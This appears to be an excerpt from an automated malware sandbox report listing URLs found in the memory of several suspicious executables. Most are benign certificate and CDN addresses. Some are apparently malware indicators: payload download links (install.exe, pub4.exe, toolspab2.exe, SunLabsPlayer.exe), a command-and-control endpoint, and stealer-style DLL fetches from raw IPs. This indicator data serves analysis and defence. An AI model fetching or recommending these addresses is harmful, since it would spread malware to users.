      Source: yevbZfdCqR.exe, 00000001.00000002.753518854.0000000005AE0000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmp, yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.152/
      Source: yevbZfdCqR.exe, 00000001.00000002.749711924.0000000000F86000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.152/(
      Source: yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.152/32
      Source: yevbZfdCqR.exe, 00000001.00000002.753180127.0000000004F0D000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/A
      Source: yevbZfdCqR.exe, 00000001.00000002.753518854.0000000005AE0000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/AS
      Source: yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.152/KB
      Source: yevbZfdCqR.exe, 00000001.00000002.753518854.0000000005AE0000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/OS
      Source: yevbZfdCqR.exe, 00000001.00000002.753180127.0000000004F0D000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/S
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.753180127.0000000004F0D000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.749754909.0000000000FAE000.00000004.00000020.sdmp, yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmp, yevbZfdCqR.exe, 00000001.00000002.754047862.0000000005E5A000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.php
      Source: yevbZfdCqR.exe, 00000001.00000002.753180127.0000000004F0D000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.php0
      Source: yevbZfdCqR.exe, 00000001.00000002.749711924.0000000000F86000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.php:
      Source: yevbZfdCqR.exe, 00000001.00000002.753180127.0000000004F0D000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.php=
      Source: yevbZfdCqR.exe, 00000001.00000002.753180127.0000000004F0D000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.phpF
      Source: yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.phpM
      Source: yevbZfdCqR.exe, 00000001.00000002.753518854.0000000005AE0000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.phpeS
      Source: yevbZfdCqR.exe, 00000001.00000002.753518854.0000000005AE0000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.phpeoP
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.phpf=
      Source: yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.phpiq4
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.phpq
      Source: yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.phps
      Source: yevbZfdCqR.exe, 00000001.00000002.753518854.0000000005AE0000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.phpssP
      Source: yevbZfdCqR.exe, 00000001.00000002.753180127.0000000004F0D000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/e
      Source: yevbZfdCqR.exe, 00000001.00000002.749711924.0000000000F86000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.152/i
      Source: yevbZfdCqR.exe, 00000001.00000002.753180127.0000000004F0D000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/n
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmpString found in binary or memory: http://159.69.20.131/
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.928879580.0000000000B2D000.00000004.00000001.sdmpString found in binary or memory: http://159.69.20.131/932
      Source: md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://159.69.20.131/freebl3.dll
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmpString found in binary or memory: http://159.69.20.131/freebl3.dllH
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmpString found in binary or memory: http://159.69.20.131/freebl3.dllf
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.928879580.0000000000B2D000.00000004.00000001.sdmp, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://159.69.20.131/mozglue.dll
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmpString found in binary or memory: http://159.69.20.131/mozglue.dll(
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://159.69.20.131/msvcp140.dll
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmpString found in binary or memory: http://159.69.20.131/msvcp140.dllz
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.928879580.0000000000B2D000.00000004.00000001.sdmpString found in binary or memory: http://159.69.20.131/softokn3.dll
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmpString found in binary or memory: http://159.69.20.131/softokn3.dllctLMEMHX
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.928879580.0000000000B2D000.00000004.00000001.sdmpString found in binary or memory: http://159.69.20.131/vcruntime140.dll
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.928879580.0000000000B2D000.00000004.00000001.sdmpString found in binary or memory: http://159.69.20.131/vcruntime140.dllF
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmpString found in binary or memory: http://159.69.20.131/vcruntime140.dllYYC:
      Source: md8_8eus.exe, 00000023.00000003.932319523.0000000003F58000.00000004.00000001.sdmpString found in binary or memory: http://172.217.23.78/
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmpString found in binary or memory: http://185.20.227.194/install.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: http://185.20.227.194/install.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: http://185.20.227.194/install.exeK
      Source: yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpString found in binary or memory: http://185.20.227.194/install.exem
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: http://185.20.227.194/install.exeu
      Source: YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.967742961.0000000002D71000.00000004.00000001.sdmpString found in binary or memory: http://ahannnavod.xyz:80/
      Source: Browzar.exe, 0000001D.00000002.1027482877.0000000000879000.00000004.00000020.sdmpString found in binary or memory: http://ajax.googleapis.com/7
      Source: Browzar.exe, 0000001D.00000002.1031318716.00000000008AA000.00000004.00000020.sdmp, Browzar.exe, 0000001D.00000003.736678674.00000000008D0000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000002.1032923448.00000000008BC000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js
      Source: Browzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpString found in binary or memory: http://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.jsP
      Source: Browzar.exe, 0000001D.00000002.1027482877.0000000000879000.00000004.00000020.sdmpString found in binary or memory: http://ajax.googleapis.com/o
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
      Source: md8_8eus.exe, 00000023.00000003.960760720.0000000004008000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.943050951.0000000003E90000.00000004.00000001.sdmpString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=true
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: http://cps.letsencrypt.org0
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
      Source: yevbZfdCqR.exe, 00000001.00000003.647771339.0000000005DE1000.00000004.00000001.sdmp, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.928879580.0000000000B2D000.00000004.00000001.sdmp, 5hIw8OebGuR7XztS5WBp_Scm.exe, 00000012.00000003.704147126.00000000048E0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
      Source: md8_8eus.exe, 00000023.00000003.942943627.0000000003FB0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
      Source: md8_8eus.exe, 00000023.00000003.942943627.0000000003FB0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.1034470755.0000000001762000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000003.736937101.0000000005D2C000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
      Source: md8_8eus.exe, 00000023.00000003.942943627.0000000003FB0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
      Source: Browzar.exe, 0000001D.00000003.736937101.0000000005D2C000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
      Source: yevbZfdCqR.exe, 00000001.00000003.647771339.0000000005DE1000.00000004.00000001.sdmp, 5hIw8OebGuR7XztS5WBp_Scm.exe, 00000012.00000003.704147126.00000000048E0000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.928879580.0000000000B2D000.00000004.00000001.sdmpString found in binary or memory: http://crl.usertrust.co
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
      Source: yevbZfdCqR.exe, 00000001.00000003.647335299.0000000004F72000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Clox~
      Source: md8_8eus.exe, 00000023.00000003.960760720.0000000004008000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: md8_8eus.exe, 00000023.00000003.921300189.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
      Source: md8_8eus.exe, 00000023.00000003.942943627.0000000003FB0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
      Source: md8_8eus.exe, 00000023.00000003.960760720.0000000004008000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: Browzar.exe, 0000001D.00000003.736937101.0000000005D2C000.00000004.00000001.sdmpString found in binary or memory: http://crls.pki.goog/gts1c3/fVJxbV-Ktmk.crl0
      Source: Browzar.exe, 0000001D.00000003.736638558.0000000005D3C000.00000004.00000001.sdmpString found in binary or memory: http://crls.pki.goog/gts1c3/moVDfISia2k.crl0
      Source: yevbZfdCqR.exe, 00000001.00000003.647771339.0000000005DE1000.00000004.00000001.sdmp, 5hIw8OebGuR7XztS5WBp_Scm.exe, 00000012.00000003.704147126.00000000048E0000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.928879580.0000000000B2D000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpString found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpString found in binary or memory: http://duckduckgo.com/?q=http://www.google.com/?q=iTunes/9.0.2
      Source: Browzar.exe, 0000001D.00000003.733990829.000000000263B000.00000004.00000001.sdmpString found in binary or memory: http://en.wikip
      Source: gDoWsyv4ZlqhjBKjyfkjR1BY.exe, 00000014.00000002.965220309.000000000069A000.00000004.00000020.sdmpString found in binary or memory: http://fairsence.com/campaign/?type=32&source=campaign1&pinf1=
      Source: gDoWsyv4ZlqhjBKjyfkjR1BY.exe, 00000014.00000002.965220309.000000000069A000.00000004.00000020.sdmpString found in binary or memory: http://fairsence.com/campaign/?type=err&source=campaign1&pinf1=
      Source: gDoWsyv4ZlqhjBKjyfkjR1BY.exe, 00000014.00000002.965220309.000000000069A000.00000004.00000020.sdmpString found in binary or memory: http://fairsence.com/campaign/?type=reg&source=campaign1&pinf1=
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmp, yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: http://flamkravmaga.com/pub4.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpString found in binary or memory: http://flamkravmaga.com/pub4.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmpString found in binary or memory: http://flamkravmaga.com/pub4.exeeG
      Source: yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpString found in binary or memory: http://flamkravmaga.com/pub4.exehttp://185.20.227.194/install.exehttps://cdn.discordapp.com/attachme
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: http://flamkravmaga.com/pub4.exei
      Source: yevbZfdCqR.exe, 00000001.00000002.749711924.0000000000F86000.00000004.00000020.sdmp, yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://freeprivacytoolsforyou.xyz/downloads/toolspab2.exe
      Source: yevbZfdCqR.exe, 00000001.00000003.646390452.0000000005AEC000.00000004.00000001.sdmpString found in binary or memory: http://freeprivacytoolsforyou.xyz/downloads/toolspab2.exe-
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: http://freeprivacytoolsforyou.xyz/downloads/toolspab2.exeC:
      Source: BqbASL8ovE3o_gRiKrvwENXN.exe, 00000010.00000002.1003153050.0000000000199000.00000004.00000001.sdmpString found in binary or memory: http://g-partners.top/dlc/distribution.php?pub=mixinte
      Source: md8_8eus.exe, 00000023.00000003.956833511.0000000004018000.00000004.00000001.sdmpString found in binary or memory: http://google.com/
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmpString found in binary or memory: http://https://_bad_pdb_file.pdb
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuG4N?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuQtg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTly?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTp7?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuY5J?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv4Ge?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv842?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbPR?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbce?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvoN9?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXiwM?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
      Source: md8_8eus.exe, 00000023.00000003.786028152.0000000003EBC000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB46JmN?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB6Ma4a?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBRUB0d?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBWoHwx?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
      Source: md8_8eus.exe, 00000023.00000003.786028152.0000000003EBC000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
      Source: md8_8eus.exe, 00000023.00000003.786028152.0000000003EBC000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BByBEMv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
      Source: yevbZfdCqR.exe, 00000001.00000003.654242726.0000000005DE1000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000003.657101676.0000000005E51000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.987178090.0000000000C53000.00000002.00020000.sdmp, jooyu.exe, 0000001A.00000002.965275698.00000000003F3000.00000002.00020000.sdmpString found in binary or memory: http://ip-api.com/json/countryCodecountry_codeofen_placemac10isinstallisLogined33uidversionc_userjaz
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpString found in binary or memory: http://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna:
      Source: M5uLwz0sXvZcR89u_43Nm9v8.exe, 0000000E.00000003.701416962.00000000027B3000.00000004.00000001.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
      Source: gDoWsyv4ZlqhjBKjyfkjR1BY.exe, 00000014.00000002.965220309.000000000069A000.00000004.00000020.sdmpString found in binary or memory: http://marsdevelopmentsftwr.com/data/data.7z
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmpString found in binary or memory: http://newscommer.com/app/app.exe
      Source: yevbZfdCqR.exe, 00000001.00000003.658455877.0000000005B37000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://nicepricingsaleregistration.com/campaign1/SunLabsPlayer.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749711924.0000000000F86000.00000004.00000020.sdmpString found in binary or memory: http://nicepricingsaleregistration.com/campaign1/SunLabsPlayer.exe9a
      Source: yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpString found in binary or memory: http://nicepricingsaleregistration.com/campaign1/SunLabsPlayer.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000003.657221230.0000000005B0F000.00000004.00000001.sdmpString found in binary or memory: http://nicepricingsaleregistration.com/campaign1/SunLabsPlayer.exeE
      Source: yevbZfdCqR.exe, 00000001.00000003.645849368.0000000004F52000.00000004.00000001.sdmp, gDoWsyv4ZlqhjBKjyfkjR1BY.exe, 00000014.00000002.964961247.000000000040B000.00000002.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: yevbZfdCqR.exe, 00000001.00000003.645849368.0000000004F52000.00000004.00000001.sdmp, gDoWsyv4ZlqhjBKjyfkjR1BY.exe, 00000014.00000002.964961247.000000000040B000.00000002.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: yevbZfdCqR.exe, 00000001.00000003.647771339.0000000005DE1000.00000004.00000001.sdmp, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.928879580.0000000000B2D000.00000004.00000001.sdmp, 5hIw8OebGuR7XztS5WBp_Scm.exe, 00000012.00000003.704147126.00000000048E0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.960760720.0000000004008000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921300189.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
      Source: md8_8eus.exe, 00000023.00000003.921300189.0000000003E20000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.942943627.0000000003FB0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
      Source: md8_8eus.exe, 00000023.00000003.942943627.0000000003FB0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.1034470755.0000000001762000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000003.736937101.0000000005D2C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr10)
      Source: md8_8eus.exe, 00000023.00000003.942943627.0000000003FB0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
      Source: Browzar.exe, 0000001D.00000003.736937101.0000000005D2C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1c301
      Source: Browzar.exe, 0000001D.00000003.736937101.0000000005D2C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gtsr100
      Source: yevbZfdCqR.exe, 00000001.00000003.651814157.0000000004F55000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
      Source: yevbZfdCqR.exe, 00000001.00000003.647771339.0000000005DE1000.00000004.00000001.sdmp, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.928879580.0000000000B2D000.00000004.00000001.sdmp, 5hIw8OebGuR7XztS5WBp_Scm.exe, 00000012.00000003.704147126.00000000048E0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0#
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.746523925.0000000000B26000.00000004.00000001.sdmpString found in binary or memory: http://ogp.me/
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmpString found in binary or memory: http://ogp.me/ns#
